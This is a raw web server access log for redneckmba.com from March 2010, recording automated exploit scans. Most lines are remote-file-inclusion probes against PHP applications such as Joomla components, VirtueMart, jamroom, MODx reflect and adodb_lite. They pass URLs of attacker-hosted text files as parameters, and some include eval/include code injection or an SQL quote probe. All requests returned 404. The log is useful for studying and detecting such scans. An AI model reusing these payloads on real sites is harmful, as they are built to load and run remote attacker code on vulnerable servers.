66.7.222.43 - - [07/Mar/2010:22:59:33 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:05:54 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:05:54 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:05:54 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
123.143.29.250 - - [07/Mar/2010:23:06:27 -0800] "GET /logs/access_100125.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
123.143.29.250 - - [07/Mar/2010:23:06:27 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
123.143.29.250 - - [07/Mar/2010:23:06:27 -0800] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.166.221 - - [07/Mar/2010:23:12:36 -0800] "GET //vwar/backup/errors.php?error=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.221 - - [07/Mar/2010:23:12:36 -0800] "GET /logs///vwar/backup/errors.php?error=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.221 - - [07/Mar/2010:23:12:36 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.206 - - [07/Mar/2010:23:18:27 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [07/Mar/2010:23:22:48 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:26:01 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:26:03 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:26:03 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
210.116.122.95 - - [07/Mar/2010:23:33:44 -0800] "GET /logs/access.log//write.php?dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.65" "redneckmba.com"
210.116.122.95 - - [07/Mar/2010:23:33:45 -0800] "GET /write.php?dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.65" "redneckmba.com"
210.116.122.95 - - [07/Mar/2010:23:33:45 -0800] "GET /logs//write.php?dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.65" "redneckmba.com"
72.52.167.78 - - [07/Mar/2010:23:33:47 -0800] "GET /logs//include/write.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.52.167.78 - - [07/Mar/2010:23:33:47 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.52.167.78 - - [07/Mar/2010:23:33:47 -0800] "GET /include/write.php?dir=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [07/Mar/2010:23:37:41 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:39:28 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:39:28 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:39:28 -0800] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:48:35 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:48:37 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:48:37 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:49:23 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:49:28 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:49:28 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.126.254.139 - - [07/Mar/2010:23:49:45 -0800] "GET /skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.126.254.139 - - [07/Mar/2010:23:49:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.126.254.139 - - [07/Mar/2010:23:49:45 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
199.120.90.223 - - [07/Mar/2010:23:50:03 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:50:09 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:50:09 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:50:09 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:51:06 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:51:06 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:51:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:52:31 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:52:32 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:52:32 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:53:34 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:53:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:53:35 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "redneckmba.com"
205.234.186.15 - - [07/Mar/2010:23:53:36 -0800] "GET /logs//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [07/Mar/2010:23:53:36 -0800] "GET /login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [07/Mar/2010:23:53:36 -0800] "GET /logs/access.log%20%20//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [07/Mar/2010:23:53:55 -0800] "GET /logs//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [07/Mar/2010:23:53:55 -0800] "GET /login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [07/Mar/2010:23:53:55 -0800] "GET /logs/access.log%20%20//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.106 - - [07/Mar/2010:23:54:19 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [07/Mar/2010:23:57:22 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:58:29 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:58:29 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:58:30 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:58:39 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:58:40 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
61.63.82.14 - - [07/Mar/2010:23:58:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
209.126.254.139 - - [08/Mar/2010:00:00:15 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:00:00:15 -0800] "GET /skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:00:00:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:00:01:02 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:01:04 -0800] "GET /logs//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:01:04 -0800] "GET /login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:01:04 -0800] "GET /logs/access.log//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:01:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:01:06 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:01:06 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:01:48 -0800] "GET /login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:01:49 -0800] "GET /logs//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:01:49 -0800] "GET /logs/access.log//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:03:07 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:03:08 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:03:08 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:04:20 -0800] "GET //bbs///delete_comment.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:04:20 -0800] "GET /logs///bbs///delete_comment.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:04:20 -0800] "GET /logs/access.log%20%20///bbs///delete_comment.php?board_skin_path=http://nazwa.zoomshare.com/files/2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.120.104.120 - - [08/Mar/2010:00:04:46 -0800] "GET /skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.120.104.120 - - [08/Mar/2010:00:04:46 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.120.104.120 - - [08/Mar/2010:00:04:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:06:58 -0800] "GET /logs/access.log//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
205.234.186.15 - - [08/Mar/2010:00:07:18 -0800] "GET /logs/access.log//login.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:18:46 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:18:46 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:18:50 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:21:48 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:21:48 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:21:51 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dogokdong.com/g4/data/file/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:08 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:08 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:08 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:16 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:16 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:16 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:18 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:18 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:18 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:40 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:40 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
219.94.193.152 - - [08/Mar/2010:00:26:40 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lumixclub.com/bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [08/Mar/2010:00:27:51 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
189.108.172.26 - - [08/Mar/2010:00:30:28 -0800] "GET /logs/access.log///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.108.172.26 - - [08/Mar/2010:00:30:28 -0800] "GET /logs///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
189.108.172.26 - - [08/Mar/2010:00:30:28 -0800] "GET //good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:35:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:35:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:35:33 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:35:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:35:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
